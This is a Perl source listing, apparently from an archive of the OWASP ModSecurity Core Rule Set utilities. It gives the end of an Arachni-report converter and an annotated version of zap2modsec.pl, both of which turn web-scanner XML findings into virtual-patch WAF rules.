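my $num_rules_generated=0;
my $num_not_supported=0;
my $num_bad_urls=0;

# NOTE(review): $wait_for_keypress, $request_failed, @id, $num_attacks_flag
# and $num_attacks_noflag appear to be unused in this script; they are kept
# so that the declarations stay as the author wrote them.
my $wait_for_keypress=1;
my $request_failed=0;

my $all_vulns_xml;   # parsed report, set in the main section
my @type;            # one entry per reported issue, filled in the main section
my @id;
my $vuln_count;      # index of the issue currently being processed
my $num_attacks_flag=0;
my $num_attacks_noflag=0;

# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#############
# Main #
#############

# Clean up env so perl doesn't complain
# when trying to run the restart snort
# script.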
delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)}; $all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename); @type = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','name'); @url = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','url'); @param = $all_vulns_xml->{arachni_report}{issues}{issue}('[@]','variable'); open(my $MODSEC_RULES, '>' , $modsec_rules_file) || die "Unable to open modsecurity rules file $modsec_rules_file"; $MODSEC_RULES->autoflush(1); $vuln_count = 0; foreach my $current_type (@type){ print "==================================================================================================\n"; print "Vulnerability[$vuln_count] - Type: $current_type\n"; if(exists {map { $_ => 1 } @supported_vulns}->{$current_type}){ parseData(to_string($current_type)); }else { print "Vulnerability Type: $type is not supported in this version.\n"; $num_not_supported++; } $vuln_count++; } close($MODSEC_RULES); print "==================================================================================================\n"; print "\n\n************ END OF SCRIPT RESULTS *****************\n"; print "Number of Vulnerabilities Processed: $vuln_count\n"; print "Number of ModSecurity rules generated: $num_rules_generated\n"; print "Number of Unsupported vulns skipped: $num_not_supported\n"; print "Number of bad URLs (rules not gen): $num_bad_urls\n"; print "****************************************************\n\n"; print "----------------------------------------------------\n"; print "To activate the virtual patching file ($modsec_rules_file),\n"; print "copy it into the CRS \"base_rules\" directory and then create\n"; print "a symlink to it in the \"activated_rules\" directory.\n"; print "-----------------------------------------------------\n\n"; ############### # Subroutines # ############### sub parseData { my($vuln_str) = @_; my $vuln_detail_filename; my $current_vuln_xml; my $current_vuln_url; my $current_vuln_param; my $current_uricontent; my 
@current_params; my $id = $vuln_count; print "Found a $vuln_str vulnerability.\n"; $current_vuln_xml = XML::Smart->new($all_vulnerabilities_filename); $current_vuln_url = $url[$vuln_count]; print URL_LIST "$current_vuln_url\n"; # Validate url (need seperate sub?) print "Validating URL: $current_vuln_url\n"; if(is_uri(to_string($current_vuln_url))){ print "URL is well-formed\n"; print "Continuing Rule Generation\n"; } else { print "URL is NOT well-formed. Breaking Out of Rule Generation\n"; $num_bad_urls++; # Waits for keypress in test mode so you can # see why the URL failed validation. if($test_mode){ wait_for_keypress(); } return; } $current_uricontent = get_uricontent($current_vuln_url); # Only need param if XSS attack,SQLINJ,XPATH # and maybe for HTTPRS, DT. # NOT for PRL and DI if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ @current_params = $param[$vuln_count]; } if(($vuln_str ne $VULN_CLASS_PRL) && ($vuln_str ne $VULN_CLASS_DI)){ print "Current vulnerable Param(s): @current_params\n"; } generate_patch($vuln_str,$current_uricontent,@current_params); } sub generate_patch { my($type,$uricontent,@params,$current_vuln_xml) = @_; my $rule = ""; $id = "1".$vuln_count; switch($type) { case ($VULN_CLASS_XSS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ # Check to see if each vulnerable parameter is valid # then generate a rule using both uricontent and the # parameter $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/XSS.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# 
Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_XSS (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_BLIND_SQLI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/SQL_INJECTION.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_SQLI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case 
($VULN_CLASS_LFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/LFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_RFI) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RFI.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: $id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_LFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } case ($VULN_CLASS_HTTPRS) { if($uricontent ne "" && @params){ foreach(@params){ if($_ ne ""){ $rule = "SecRule REQUEST_FILENAME \"$uricontent\" \"chain,phase:2,t:none,block,msg:'Virtual Patch for $type',id:'$id',tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25',logdata:'%{matched_var_name}',severity:'2'\"\n\tSecRule \&TX:\'\/RESPONSE_SPLITTING.*ARGS:$_\/\' \"\@gt 0\" \"setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}\""; print $MODSEC_RULES "#\n# Arachni Virtual Patch Details:\n# ID: 
$id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $_\n#\n".$rule."\n\n"; print "$VULN_CLASS_RFI (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n"; $num_rules_generated++; } } } } } } sub get_uricontent { my($url) = @_; my $regex = "http:\/\/+[a-zA-Z0-9.:-]*\/"; # First, trim the first part out of the URL: # http://.../ $url =~ /$regex/; substr($url,index($url,$&),length($&)) = ""; # If the URL contains a php or cgi query with # one or more params and values, trim those out. # Trim from the question mark to the end. if($url =~ /\?/){ substr($url,index($url,"?")) = ""; } return $url; } SpiderLabs-owasp-modsecurity-crs-0f07cbb/util/virtual-patching/zap2modsec.pl000077500000000000000000000307231216457256400273760ustar00rootroot00000000000000#!/opt/local/bin/perl -T ############################################# # -=[ Virtual Patching Converter Script ]=- # # Converts OWASP ZAP XML Ouput # # https://code.google.com/p/zaproxy/ # # # # zap2modsec.pl # # Version: 1.0 # # # # Copyright 2011 # # Trustwave's SpiderLabs Research Team # # www.trustwave.com # # # # Based On Code Originally Created by: # # The Denim Group # # www.denimgroup.com # ############################################# use XML::Smart; use Switch; use Data::Types qw(:all); use Data::Validate::URI qw(is_uri); use Getopt::Std; use Acme::Comment type=>'C++', one_line=>1; #Block commenting, can be removed later ############# # Variables # ############# # [Configuration Vars] my %param; getopt("f",\%param); $filename = $param{f}; my $all_vulnerabilities_filename = "$filename"; unless ($filename) { print "Flag:\n\n\t -f:\t path to ZAP xml report file\nUsage:\n\n\t./zap2modsec.pl -f ./zap_report.xml\n\n"; exit; } my $modsec_rules_file = "./modsecurity_crs_48_virtual_patches.conf"; # [End Config Vars] my $VULN_CLASS_XSS = "Cross Site Scripting"; my $VULN_CLASS_SQLI = "SQL Injection"; my $VULN_CLASS_SQLI_FINGERPRINT = "SQL Injection Fingerprinting"; my 
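$VULN_CLASS_LFI = "Path Traversal";    # completes the `my` that ends the previous line
my $VULN_CLASS_RFI = "Remote File Inclusion";
my $VULN_CLASS_HTTPRS = "HTTP Response Splitting";

# Only the vulnerabilities in this array will have
# rules generated for them.
my @supported_vulns = ($VULN_CLASS_XSS,
                       $VULN_CLASS_SQLI,
                       $VULN_CLASS_SQLI_FINGERPRINT,
                       $VULN_CLASS_LFI,
                       $VULN_CLASS_RFI,
                       $VULN_CLASS_HTTPRS);

# Lookup form of @supported_vulns, built once instead of per alert.
my %is_supported = map { $_ => 1 } @supported_vulns;

# The generated rules differ per class only in these three fragments:
#   tags      - tag actions placed in the first (chain starter) rule
#   tx_prefix - prefix of the TX variable names the chained rule counts
#   setvars   - action list of the chained rule
my $SQLI_TAGS    = q{tag:'WEB_ATTACK/SQL_INJECTION',tag:'WASCTC/WASC-19',tag:'OWASP_TOP_10/A1',tag:'OWASP_AppSensor/CIE1',tag:'PCI/6.5.2'};
my $SQLI_SETVARS = q{setvar:'tx.msg=%{rule.msg}',setvar:tx.sql_injection_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}};
my $PLAIN_SETVARS = q{setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}};

my %rule_parts_for = (
    $VULN_CLASS_XSS => {
        tags      => q{tag:'WEB_ATTACK/XSS',tag:'WASCTC/WASC-8',tag:'WASCTC/WASC-22',tag:'OWASP_TOP_10/A2',tag:'OWASP_AppSensor/IE1',tag:'PCI/6.5.1'},
        tx_prefix => 'XSS',
        setvars   => q{setvar:'tx.msg=%{rule.msg}',setvar:tx.xss_score=+%{tx.critical_anomaly_score},setvar:tx.anomaly_score=+%{tx.critical_anomaly_score}},
    },
    $VULN_CLASS_SQLI => {
        tags      => $SQLI_TAGS,
        tx_prefix => 'SQL_INJECTION',
        setvars   => $SQLI_SETVARS,
    },
    # The original dispatched on an undeclared $VULN_CLASS_BLIND_SQLI, so
    # "SQL Injection Fingerprinting" alerts passed the supported check but
    # never produced a rule. They get the same rule body as plain SQLi.
    $VULN_CLASS_SQLI_FINGERPRINT => {
        tags      => $SQLI_TAGS,
        tx_prefix => 'SQL_INJECTION',
        setvars   => $SQLI_SETVARS,
    },
    $VULN_CLASS_LFI => {
        tags      => q{tag:'WEB_ATTACK/LFI',tag:'WASCTC/WASC-33'},
        tx_prefix => 'LFI',
        setvars   => $PLAIN_SETVARS,
    },
    $VULN_CLASS_RFI => {
        tags      => q{tag:'WEB_ATTACK/RFI',tag:'WASCTC/WASC-05'},
        tx_prefix => 'RFI',
        setvars   => $PLAIN_SETVARS,
    },
    $VULN_CLASS_HTTPRS => {
        tags      => q{tag:'WEB_ATTACK/RESPONSE_SPLITTING',tag:'WASCTC/WASC-25'},
        tx_prefix => 'RESPONSE_SPLITTING',
        setvars   => $PLAIN_SETVARS,
    },
);

my $num_rules_generated=0;
my $num_not_supported=0;
my $num_bad_urls=0;
my $wait_for_keypress=1;
my $request_failed=0;
my $all_vulns_xml;
my @type;
my @url;
my @param;
my @id;
my $vuln_count;
my $num_attacks_flag=0;
my $num_attacks_noflag=0;

# End Vars ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

#############
# Main      #
#############

# The script runs under -T (see the shebang). Dropping these variables is
# the usual taint-mode hygiene; nothing in this script runs an external
# command.
delete @ENV{qw(IFS CDPATH ENV BASH_ENV PATH)};

$all_vulns_xml = XML::Smart->new($all_vulnerabilities_filename);

# Three parallel lists, one entry per <alertitem>.
# NOTE(review): the code below assumes index N of @type, @url and @param
# belongs to the same alert. Confirm this holds for alerts that carry no
# <param> element, otherwise a rule could name the wrong parameter.
@type = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','alert');
@url = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','uri');
@param = $all_vulns_xml->{OWASPZAPReport}{site}{alerts}{alertitem}('[@]','param');

open(my $MODSEC_RULES, '>', $modsec_rules_file)
    or die "Unable to open modsecurity rules file $modsec_rules_file: $!";
$MODSEC_RULES->autoflush(1);

$vuln_count = 0;
foreach my $current_type (@type){
    print "==================================================================================================\n";
    print "Vulnerability[$vuln_count] - Type: $current_type\n";
    if ($is_supported{$current_type}) {
        parseData(to_string($current_type));
    }
    else {
        # The original interpolated the undeclared scalar $type here, so the
        # message never named the skipped class.
        print "Vulnerability Type: $current_type is not supported in this version.\n";
        $num_not_supported++;
    }
    $vuln_count++;
}

# A failed close means the rule file may be truncated; do not report success.
close($MODSEC_RULES)
    or die "Unable to close modsecurity rules file $modsec_rules_file: $!";

print "==================================================================================================\n";
print "\n\n************ END OF SCRIPT RESULTS *****************\n";
print "Number of Vulnerabilities Processed:   $vuln_count\n";
print "Number of ModSecurity rules generated: $num_rules_generated\n";
print "Number of Unsupported vulns skipped:   $num_not_supported\n";
print "Number of bad URLs (rules not gen):    $num_bad_urls\n";
print "****************************************************\n\n";
print "----------------------------------------------------\n";
print "To activate the virtual patching file ($modsec_rules_file),\n";
print "copy it into the CRS \"base_rules\" directory and then create\n";
print "a symlink to it in the \"activated_rules\" directory.\n";
print "-----------------------------------------------------\n\n";

###############
# Subroutines #
###############

# Handles the alert at index $vuln_count: validates its URL, reduces it to a
# path and hands path plus parameter to generate_patch().
#
#   $vuln_str - alert class name (one of @supported_vulns)
#
# Reads the file-level @url, @param and $vuln_count; increments
# $num_bad_urls when the URL is rejected.
sub parseData {
    my ($vuln_str) = @_;

    print "Found a $vuln_str vulnerability.\n";

    my $current_vuln_url = $url[$vuln_count];

    print "Validating URL: $current_vuln_url\n";
    if (!is_uri(to_string($current_vuln_url))) {
        print "URL is NOT well-formed. Breaking Out of Rule Generation\n";
        $num_bad_urls++;
        return;
    }
    print "URL is well-formed\n";
    print "Continuing Rule Generation\n";

    my $current_uricontent = get_uricontent($current_vuln_url);

    # The original guarded this with comparisons against $VULN_CLASS_PRL and
    # $VULN_CLASS_DI, neither of which is declared in this script, so the
    # guard was always true for every supported class.
    my @current_params = ($param[$vuln_count]);
    print "Current vulnerable Param(s): @current_params\n";

    generate_patch($vuln_str, $current_uricontent, @current_params);
    return;
}

# True when $value can be placed inside the quoted strings and comment lines
# of the generated rule file without ending them early: no quote, no
# backslash, no control character (which includes CR and LF).
sub _is_safe_for_rule {
    my ($value) = @_;
    return 0 if !defined $value;
    return ($value =~ /["'\\\x00-\x1f\x7f]/) ? 0 : 1;
}

# Writes one chained ModSecurity rule per vulnerable parameter to
# $MODSEC_RULES.
#
#   $type       - alert class name; selects the fragments in %rule_parts_for
#   $uricontent - path as returned by get_uricontent()
#   @params     - vulnerable parameter names
#
# The first rule matches REQUEST_FILENAME against $uricontent; the chained
# rule fires when at least one TX variable name matches
# /<tx_prefix>.*ARGS:<param>/ (presumably set by the CRS detection rules,
# which are not part of this script).
#
# Both values come from the scanner report and are written into a WAF
# configuration file, so anything that could close a quoted string or start
# a new line is refused rather than written.
#
# NOTE: $uricontent and the parameter name are still used as regular
# expressions by the generated rules (REQUEST_FILENAME uses the default
# regex operator), so "." matches any character and a name such as "a[]"
# may not compile when the rule file is loaded.
#
# Rule ids are "1" followed by the alert index, so a second run against
# another report reuses the same ids; check them against the ids already
# loaded before activating the file.
sub generate_patch {
    my ($type, $uricontent, @params) = @_;

    my $parts = $rule_parts_for{$type};
    return if !$parts;
    return if $uricontent eq "" || !@params;

    if (!_is_safe_for_rule($uricontent)) {
        print "URL path contains characters that are not safe in a rule. No rule generated.\n";
        $num_bad_urls++;
        return;
    }

    my $rule_id = "1" . $vuln_count;

    PARAM:
    foreach my $param_name (@params) {
        next PARAM if !defined $param_name || $param_name eq "";

        if (!_is_safe_for_rule($param_name)) {
            print "Parameter name contains characters that are not safe in a rule. No rule generated.\n";
            next PARAM;
        }

        my $rule = sprintf(
            qq{SecRule REQUEST_FILENAME "%s" "chain,phase:2,t:none,block,msg:'Virtual Patch for %s',id:'%s',%s,logdata:'%%{matched_var_name}',severity:'2'"\n}
          . qq{\tSecRule &TX:'/%s.*ARGS:%s/' "\@gt 0" "%s"},
            $uricontent, $type, $rule_id, $parts->{tags},
            $parts->{tx_prefix}, $param_name, $parts->{setvars},
        );

        print {$MODSEC_RULES} "#\n# OWASP ZAP Virtual Patch Details:\n# ID: $rule_id\n# Type: $type\n# Vulnerable URL: $uricontent\n# Vulnerable Parameter: $param_name\n#\n" . $rule . "\n\n";

        # The original printed a hard-coded class name here, and the wrong
        # one for the RFI and HTTP Response Splitting branches.
        print "$type (uricontent and param) rule successfully generated and saved in $modsec_rules_file.\n";
        $num_rules_generated++;
    }
    return;
}

# Reduces a URL to the path that the generated rule matches against
# REQUEST_FILENAME.
#
#   $url - absolute URL from the report
#
# Returns the URL with the first "scheme://host[:port]/" removed and with
# everything from the first "?" onwards removed. A URL without such a prefix
# is returned with only the query string removed.
#
# The original matched "http://" only and then cut the URL using $&, so an
# https URL was left whole (its rule could never match a request path) and a
# failed match cut at whatever $& happened to hold.
sub get_uricontent {
    my ($url) = @_;

    # Work on a plain string; the caller may pass an XML::Smart node.
    my $path = "$url";

    # First, trim the first part out of the URL:
    # http://.../ or https://.../
    $path =~ s{https?://+[a-zA-Z0-9.:-]*/}{};

    # If the URL contains a php or cgi query with
    # one or more params and values, trim those out.
    # Trim from the question mark to the end.
    $path =~ s{\?.*}{}s;

    return $path;
}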